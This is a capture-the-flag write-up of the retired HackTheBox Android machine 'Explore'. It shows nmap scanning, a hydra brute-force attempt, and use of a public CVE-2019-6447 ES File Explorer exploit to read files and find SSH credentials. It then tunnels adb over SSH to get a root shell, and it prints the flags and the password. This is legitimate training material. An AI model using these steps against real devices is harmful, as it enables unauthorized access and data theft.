HTB Write-up | Explore

Retired machine can be found here.


esketit

Let's start with some basic scanning:

~ nmap -A 10.10.10.247

PORT     STATE    SERVICE    VERSION
2222/tcp open     ssh     (protocol 2.0)
| fingerprint-strings: 
|   NULL: 
|_    SSH-2.0-SSH Server - Banana Studio
| ssh-hostkey: 
|_  2048 71:90:e3:a7:c9:5d:83:66:34:88:3d:eb:b4:c7:88:fb (RSA)
5555/tcp filtered freeciv

On Android, the 5555 TCP port is usually open when the Android Debug Bridge Daemon (ADBD) is running, however, in this case the port is filtered.

Let's focus on the other port: the SSH Server application from "Banana Studio" is  available on Play Store and, as you can see below, supports anonymous login ("username=ssh without any password"):

However, it seems like this anonymous login is disabled. I was also not able to brute-force the password using a relevant SecList:

~ hydra -l ssh -P ssh-passwords.txt -s 2222 -t 16 10.10.10.247 ssh

Let's expand our scanning to see what else is open:

~ nmap -p 1-65535 10.10.10.247

2222/tcp open     ssh     (protocol 2.0)
| fingerprint-strings: 
|   NULL: 
|_    SSH-2.0-SSH Server - Banana Studio
| ssh-hostkey: 
|_  2048 71:90:e3:a7:c9:5d:83:66:34:88:3d:eb:b4:c7:88:fb (RSA)
5555/tcp filtered freeciv
59777/tcp open  http    Bukkit JSONAPI httpd for Minecraft game server 3.6.0 or older
|_http-title: Site doesn't have a title (text/plain).

Nice, another port!

Doing a bit of Googling we come across CVE-2019-6447:

The ES File Explorer File Manager application through 4.1.9.7.4 for Android allows remote attackers to read arbitrary files or execute applications via TCP port 59777 requests on the local Wi-Fi network. This TCP port remains open after the ES application has been launched once, and responds to unauthenticated application/json data over HTTP.

In order to exploit this misconfiguration, we can use this exploit.

After some trial and error, and with a bit of luck, I came across the user flag:

~ python3 50070.py getFile 10.10.10.247 /sdcard/user.txt 

==================================================================
|    ES File Explorer Open Port Vulnerability : CVE-2019-6447    |
|                Coded By : Nehal a.k.a PwnerSec                 |
==================================================================

[+] Downloading file...
[+] Done. Saved as `out.dat`.

~ htb_explore cat out.dat                                           
f32017174c7c7e8f50c6da52891ae250

Road to root

Let's continue enumerating using the other available commands for this script:

~ python3 50070.py listPics 10.10.10.247

==================================================================
|    ES File Explorer Open Port Vulnerability : CVE-2019-6447    |
|                Coded By : Nehal a.k.a PwnerSec                 |
==================================================================

...
name : creds.jpg
time : 4/21/21 02:38:18 AM
location : /storage/emulated/0/DCIM/creds.jpg
size : 1.14 MB (1,200,401 Bytes)
...

And we got a winner!

~ ssh kristi@10.10.10.247 -p 2222
> Kr1sT!5h@Rp3xPl0r3!

$ whoami
u0_a76

Now that we have access to some SSH credentials, let's forward the traffic from the machine's adb service to a local port:

~ adb start-server
* daemon not running; starting now at tcp:5037
* daemon started successfully

~ ssh -i ssh_key kristi@10.10.10.247 -L 5555:127.0.0.1:5555 -p 2222
> Kr1sT!5h@Rp3xPl0r3!

$ whoami
u0_a76

Then, on another tab on the local machine we can connect to the local service:

~ adb connect 127.0.0.1:5555
connected to 127.0.0.1:5555

~ adb shell

$ whoami
shell

Now let's see if we can authenticate as root:

$ su - root

$ whoami
root

$ cd data      

$ ls
adb           bootchart     media       property       tombstones 
anr           cache         mediadrm    resource-cache user       
app           dalvik-cache  misc        root.txt       user_de    
app-asec      data          misc_ce     ss             vendor     
app-ephemeral drm           misc_de     ssh_starter.sh vendor_ce  
app-lib       es_starter.sh nfc         system         vendor_de  
app-private   local         ota         system_ce      
backup        lost+found    ota_package system_de      

$ cat root.txt
f04fc82b6d49b41c9b08982be59338c5

Done :)